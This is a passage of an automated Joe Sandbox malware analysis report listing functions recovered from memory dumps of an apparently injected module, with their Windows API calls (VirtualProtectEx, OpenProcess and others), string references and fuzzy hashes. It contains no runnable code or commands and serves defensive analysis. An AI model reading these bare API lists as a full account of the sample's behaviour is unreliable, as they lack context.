GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F68

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: e171eeba7a317d0870049aa37f67cac7fd15115a9037dbd5f47d60e4adb0a771
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 77118636604B54E7EB248BA1F40870967B0FB94B80F141227EE4D47794EB7DD5B4C780

Function 0000022123C23EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C23A5B), ref: 0000022123C23EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C23A5B), ref: 0000022123C23F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C23A5B), ref: 0000022123C23F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C23A5B), ref: 0000022123C23F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C23A5B), ref: 0000022123C23F68

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: adea93232bc1b74ea1f2fb2f43593122b4654e1875aa32c7027c20046efe89e4
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 9E114236605754E3EB248BA1F448A5A67B0FB54B80F041227EE4D0B7A4EB7DC9B4C784

Function 0000022123C58CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123C58CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022123C58D62
RtlUnwindEx.NTDLL ref: 0000022123C58DBC

Strings

csm, xrefs: 0000022123C58D49

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 84d3f1385e561940c4141ae4ca4361b5333ec0d6a84fc8d9647b0aefcff6a037
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 4D51B036319728EADB54CB55F448F6837A1E364B88F145222EE495B7C8D7B8D8B1C700

Function 0000022123C28CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123C28CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022123C28D62
RtlUnwindEx.NTDLL ref: 0000022123C28DBC

Strings

csm, xrefs: 0000022123C28D49

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: edd84b322fcc53548a1b90fa386e2530886ffdac27580d0f1724ea4f5d982511
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 8551B136319728EADB54CB95E448F6C3791E764B98F149222FE4E4B788DB78D8B1C700

Function 0000022123BF9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123BF9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022123BF9FBC

Strings

csm, xrefs: 0000022123BFA00E
csm, xrefs: 0000022123BF9EF6

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ecb8a1998ec17816010c9a4883e086176838b77a220ce31af398d9fa5535443b
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 5351B432100350E7EB78AFA1E148B5877A0F765B94F146215FE898BBD5CB3AD470CB01

Function 0000022123C5A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000022123C5A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000022123C5A7A7

Strings

RCC, xrefs: 0000022123C5A777
MOC, xrefs: 0000022123C5A76F

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: c3bf87ba3a5575bb12758f9417ae8e2ec2dc3917a54eca3ed7fc37f06efb6e4e
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: EE61AD36504BD8D5EB218F56F444B9AB7A0F7A4B94F046316EF882BB95DB38C0E4CB00

Function 0000022123C5AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123C5AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022123C5ABBC

Strings

csm, xrefs: 0000022123C5AC0E
csm, xrefs: 0000022123C5AAF6

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 64b5c46f5b4abba4ce74594b9690873672fab8e36332b5e7e69e667b783208a7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: BD51B23A200298EBEB758F96A548B5877A0F360B84F146217EE496BBD1CB39D4F4C741

Function 0000022123BC9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123BC9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022123BC9FBC

Strings

csm, xrefs: 0000022123BCA00E
csm, xrefs: 0000022123BC9EF6

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 952c081ee1b476d36d3547288576f868cf3c03f3060175358613d0644edd1a02
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: BE519F322047A0EEEB74AF919148B58B7A0F365B94F144616FE998BBD5CB38D470CB01

Function 0000022123C2A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000022123C2A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000022123C2A7A7

Strings

RCC, xrefs: 0000022123C2A777
MOC, xrefs: 0000022123C2A76F

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 93ff9b2e65e03c3f6b5986c9975f4b9483ca2728426ada4187c31cb87cb210e2
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 8E618C36508BC8D5EB209B56E444B9AB7A0F7A5B94F046216EF9C1BB95DF78C1F0CB00

Function 0000022123C2AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123C2AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022123C2ABBC

Strings

csm, xrefs: 0000022123C2AC0E
csm, xrefs: 0000022123C2AAF6

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ab5bc46ec4431c5822e22b8002b3f66e9c3d5916e8164dee3660da2c20c47bd7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 97518F3A200768EBFB648B969548B5877A1F364B94F146217FE8D4BB95CF39C4B0CB01

Function 0000022123C53950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000022123C53972
StrStrW.SHLWAPI ref: 0000022123C53990
StrToIntW.SHLWAPI ref: 0000022123C539B7

Part of subcall function 0000022123C51A30: OpenProcess.KERNEL32 ref: 0000022123C51A56
Part of subcall function 0000022123C51A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C51A74
Part of subcall function 0000022123C51A30: PathFindFileNameW.SHLWAPI ref: 0000022123C51A83
Part of subcall function 0000022123C51A30: lstrlenW.KERNEL32 ref: 0000022123C51A8F
Part of subcall function 0000022123C51A30: StrCpyW.SHLWAPI ref: 0000022123C51AA2
Part of subcall function 0000022123C51A30: CloseHandle.KERNEL32 ref: 0000022123C51AB0

Part of subcall function 0000022123C53F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C5272F), ref: 0000022123C53FA0

Strings

pid_, xrefs: 0000022123C53968

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: e0add55bdf6be4a900d8fc8a7797fa86c835bdc6dcdc9eae78b11b51abf5549e
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 8C11B4113107A5F1EB109BB5F80875A62A4F7A4780F906233BE499B7D4EF28D8B5C700

Function 0000022123C23950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000022123C23972
StrStrW.SHLWAPI ref: 0000022123C23990
StrToIntW.SHLWAPI ref: 0000022123C239B7

Part of subcall function 0000022123C21A30: OpenProcess.KERNEL32 ref: 0000022123C21A56
Part of subcall function 0000022123C21A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C21A74
Part of subcall function 0000022123C21A30: PathFindFileNameW.SHLWAPI ref: 0000022123C21A83
Part of subcall function 0000022123C21A30: lstrlenW.KERNEL32 ref: 0000022123C21A8F
Part of subcall function 0000022123C21A30: StrCpyW.SHLWAPI ref: 0000022123C21AA2
Part of subcall function 0000022123C21A30: CloseHandle.KERNEL32 ref: 0000022123C21AB0

Part of subcall function 0000022123C23F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C2272F), ref: 0000022123C23FA0

Strings

pid_, xrefs: 0000022123C23968

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 7d4320477bb5c12188b1a442e9fb51ababa6b7014dac2ca7d1e71b12c2f78ce3
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 0C1184113107A5F1EB509BA5E80979A62A4F764780F816237BE4D8B794EF68C9B5C700

Function 0000022123C61FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000022123C62027
WriteFile.KERNEL32 ref: 0000022123C62304
WriteFile.KERNEL32 ref: 0000022123C6234A
GetLastError.KERNEL32 ref: 0000022123C62409

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 697084b2fab90e2bac92c886e91424971910ab05c6eb16e3bf06d30d4f3ec410
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 03D10232714A68DEE710CFA5D448AEC37B1F3A4798F405216EE4DABB99DB34D0A6D700

Function 0000022123C31FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000022123C32027
WriteFile.KERNEL32 ref: 0000022123C32304
WriteFile.KERNEL32 ref: 0000022123C3234A
GetLastError.KERNEL32 ref: 0000022123C32409

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 7205b9e72631fdb4bdf6d8509aad9c531c8d07a42593ae00387518af1bf25703
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 52D1F332724AA8D9EB10CFA5D444ADC37B1F364B98F405217EE5D9BB99DA34C2A6C340

Function 0000022123C514A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C514C6
HeapFree.KERNEL32 ref: 0000022123C514D5
GetProcessHeap.KERNEL32 ref: 0000022123C514E2
HeapFree.KERNEL32 ref: 0000022123C514F1
GetProcessHeap.KERNEL32 ref: 0000022123C51501

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: d7594bb4565d799d65ddd7ab09a3cdd0e4b58bf08b3ba7bad3efd3aaefb35d2f
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: CA018032611BA4EAD714DFA6E80854977A0F798F80F155126EF4957714DF34E0B1CB40

Function 0000022123C214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C214C6
HeapFree.KERNEL32 ref: 0000022123C214D5
GetProcessHeap.KERNEL32 ref: 0000022123C214E2
HeapFree.KERNEL32 ref: 0000022123C214F1
GetProcessHeap.KERNEL32 ref: 0000022123C21501

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 1f7b6dd6e01acc1b9215a9942c48a269972714f0298cb5176af215c2fd217370
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: F0018C32610BA4EAE714DFA6E80898977A0F798F80F095126EF4D47728DF34D1B2C740

Function 0000022123C628F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022123C628DF), ref: 0000022123C62A12

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: d7f5b2d8e6ef7a61f10dcc9abbbc933d11c046a646b725f13f0aac5c01a4b697
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: DA91E932720668EDF7508FA59458BAD27A0F3E4B88F446207EE4A5B789DB34D4F5DB00

Function 0000022123C328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022123C328DF), ref: 0000022123C32A12

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
